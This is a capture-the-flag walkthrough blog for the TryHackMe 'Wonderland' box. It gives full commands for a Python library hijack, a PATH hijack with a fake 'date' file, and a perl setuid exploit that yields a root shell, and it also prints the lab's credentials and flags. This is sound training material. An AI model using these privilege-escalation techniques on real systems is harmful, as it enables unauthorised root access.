TryHackMe Walkthrough – Wonderland

5/5 - (6 votes)
TryHackMe Walkthrough – Wonderland

This is part of the hacking security series on multiple TryHackMe challenges:

Introduction

Over the past few months, I’ve been working through the junior penetration tester career pathway on TryHackMe and doing hacking practice boxes on the side to keep applying my learning in practical settings.

So far almost every hacking lab includes at least one opportunity to use Python to simplify the task.

In this hacking challenge, one of the stages involves using the Python library hijacking in order to gain an initial foothold in the system. This blog post will walk you through the Wonderland box, explaining each step of the way in detail.

🌍 Recommended Tutorial: Python Library Hijacking – A Simple Demonstration on NumPy

This box introduced me to privilege escalation via the Python library hijacking. This method makes use of a system misconfiguration where one user can run a file as a different user. Then a spoofed file is created to spawn a shell in the other user’s account without knowing their password.

In the next few blog posts, I’ll guide you through the two boxes in the Alice in Wonderland series. Both boxes are free to try without a subscription to TryHackMe. If you don’t like spoilers, I’d recommend not reading any further before trying out Wonderland yourself here and the sequel, Looking Glass.

The Importance of Note-taking

I’ve found that careful note-taking has helped me be able to retest successful hacks or pick up where I left off. The notes also help to jog my memory between hacking sessions. Another added benefit is that when a similar situation comes up in a new hack, I can always look back to see how I solved a similar problem in the past.

When starting the wonderland box, I first use OpenVPN from my Linux machine to connect to HTB’s VPN. First, I export the two IPs to my Linux machine to save some cutting and pasting time later on.

***IPs***
export myIP=10.6.2.23
export targetIP=10.10.158.80

Enumeration Phase

The enumeration phase starts with an Nmap scan of the $targetIP.

  • The -T3 flag indicates a speed preference.
  • The -Pn flag skips host discovery.
  • The -sC indicates scan with default NSE scripts.

My scan reveals the following output on the terminal:

---
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-03 11:30 EDT
Nmap scan report for 10.10.59.26
Host is up (0.083s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http
|_http-title: Follow the white rabbit.

Nmap done: 1 IP address (1 host up) scanned in 6.25 seconds
---

It looks like we found one webpage on port 80 and an open ssh port on 22.

We will most likely want to ssh into the box on port 22. We can also enumerate the website further by inspecting it in a web browser and using a pen-testing tool like dirbuster or ffuf to carry out directory sniffing.

Let’s start by running ffuf. Running the following command gives us the following output:

ffuf -u http://$targetIP/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt

—

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.59.26/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

img                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 92ms]
poem                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 80ms]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 82ms]
:: Progress: [20474/20474] :: Job [1/1] :: 450 req/sec :: Duration: [0:01:05] :: Errors: 40 ::
—

Ffuf has revealed three directories: img, poem, and r. Visiting the site 10.10.59.26/img gives me three image files. 

After downloading white_rabbit_1.jpg to my local machine with wget, we can run steghide to check for hidden data.

wget $targetIP/img/white_rabbit_1.jpg
steghide extract -sf white_rabbit_1.jpg

Steghide found a hint.txt file secretly embedded within the jpg file. We can “cat” that out to see that the cat hint.txt contains:

---
follow the r a b b i t[archsurfer@dev-box wonderland-finxter-walkthrough]$
---

This is a hint that helps us to figure out that we need to “go further down the rabbit hole” and spell out “rabbit” as hidden directories. Each step of the way there are encouraging snippets of text.

Once we reach http://10.10.59.26/r/a/b/b/i/t/ we can inspect the page to find the hidden user:password combination: alice:HowDothTheLittleCrocodileImproveHisShiningTail.

Initial Foothold

Using the above password for user alice we can now ssh into the box using the following command:

sudo ssh alice@$targetIP

We are in! This is our initial foothold in the system.

Next, we will continue to enumerate and then work on privilege escalation until we can become the root user with full permissions.

There is a curious file in our alice directory: /alice/root.txt. We don’t have the permissions to cat out the root.txt. We were expecting to see a user.txt in the alice directory. Things are strange in wonderland! What if the file locations are flipped?

Let’s try the following command to check for a user.txt in the root folder:

cat /root/user.txt
thm{"Curiouser and curiouser!"}

And there we have it. We found the first flag.

Privilege Escalation

Running sudo -l checks for sudo permissions and reveals:

This bit of text highlighted in the screenshot shows that alice has special permissions to run the walrus_and_the_carpenter.py file as user rabbit.

Most likely, this is a misconfiguration that will allow us to spawn a shell as user rabbit. Let’s check out the walrus_and_the_carpenter.py file using nano:

nano walrus_and_the_carpenter.py

Here we see the python library “random” is imported. Here is our opportunity to hijack the python library by creating a new random.py file in the present working directory.

We can check the python’s path using the command:

Python3 -c 'import sys; print(sys.path)'

The first entry in the path ('') indicates that python will search first in the current directory for the library file. We can hijack the library by creating a random.py file to spawn a shell as the user rabbit.

The contents of the random.py file should be:

import os
os.system("/bin/bash")

First, we need to give ourselves execute permissions to the random.py file.

chmod +x random.py

Then we can run the command as user rabbit:

sudo -u rabbit python3.6 /home/alice/walrus_and_the_carpenter.py

This command spawns a shell and we can verify that we are now user rabbit with a whoami command.

We find a strange bin file teaParty in the alice folder. Running the cat teaParty command shows that it is encrypted with bits of clear text in the middle of the file.

The cleartext we can read appears to run a file named date. The && operator before date shows that there is a chain of commands here and a file named date will be run.

By modifying the $PATH variable we can ask bash to check in the present working directory for a file named date before looking in other locations.

Let’s first prep our file to spawn another shell. We can use the command:

echo "/bin/bash" > date

This writes a line /bin/bash to a file named date in the current directory. We’ll add execute permissions to this file and then modify the path to look first in the current directory.

chmod +x date
PATH=.:$PATH

If we run echo $PATH

Finally, we run teaParty and another shell is spawned. Running a whoami command shows that we are now user hatter.

./teaParty

Further enumeration reveals a file password.txt that we can cat out to find a password, presumably for the current user, hatter.

Let’s attempt to ssh back into the system as user hatter with the following password: hatter:WhyIsARavenLikeAWritingDesk

After sshing in as hatter, we are now faced with the final privilege escalation task, gaining access to the root user.

To lighten the workload a bit, let’s copy linpeas.sh over to hatter’s files. Linpeas.sh is a very thorough enumeration tool for Linux. To get it over to hatters account, we can download the file from GitHub and then use SCP (secure copy protocol) to transfer it over to hatter’s account on our Linux machine. 

After running linpeas.sh there is a huge dump of findings. The things highlighted in yellow with red text are the most vulnerable findings.

The Perl system programming language has setuid+ep permissions. We can search up the command to exploit this misconfiguration on gtfobins.github.io

The following command spawns a root shell and we can then cat out the final flag root.txt in alice’s directory.

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
cat root.txt

And we have finished the Wonderland box!